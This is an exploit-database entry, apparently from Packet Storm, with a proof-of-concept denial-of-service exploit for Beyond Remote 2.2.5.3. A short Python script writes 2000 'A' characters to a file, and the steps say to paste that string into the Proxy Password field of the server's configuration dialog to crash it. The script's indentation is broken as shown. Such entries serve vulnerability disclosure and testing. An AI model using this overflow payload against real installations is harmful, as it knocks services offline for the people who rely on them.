Beyond Remote 2.2.5.3 Denial Of Service

2018-09-24T00:00:00
ID PACKETSTORM:149477
Type packetstorm
Reporter Erenay Gencay
Modified 2018-09-24T00:00:00

Description

                                        
                                            `# Exploit Title: Beyond Remote 2.2.5.3 - Denial of Service (PoC)  
# Author: Erenay Gencay  
# Discovey Date: 2018-09-24  
# Vendor notified : 2018-09-24  
# Software Link: https://beyond-remote-client-and-server.jaleco.com/  
# Tested Version: 2.2.5.3  
# Tested on OS: Windows XP Professional sp3 (ENG)  
  
# Steps to Reproduce: Run the python exploit script, it will create a new file  
# file with the name "mre.txt". Copy the content of the new file "mre.txt".  
# Start Beyond Remote Server 2.2.5.3 and click "Configure" than click "Update Options" than   
# click "Proxy Settings" Paste the content into field "Proxy Password" click "OK"  
# It will cause the DOS situation.  
  
bof = "A" * 2000  
  
try:  
  
print("payload is loading..")  
  
dosya = open('mre.txt','w')  
dosya.write(bof)  
dosya.close()  
print(" [+] File Created")  
  
except:  
print("Someting went wrong !")  
  
  
`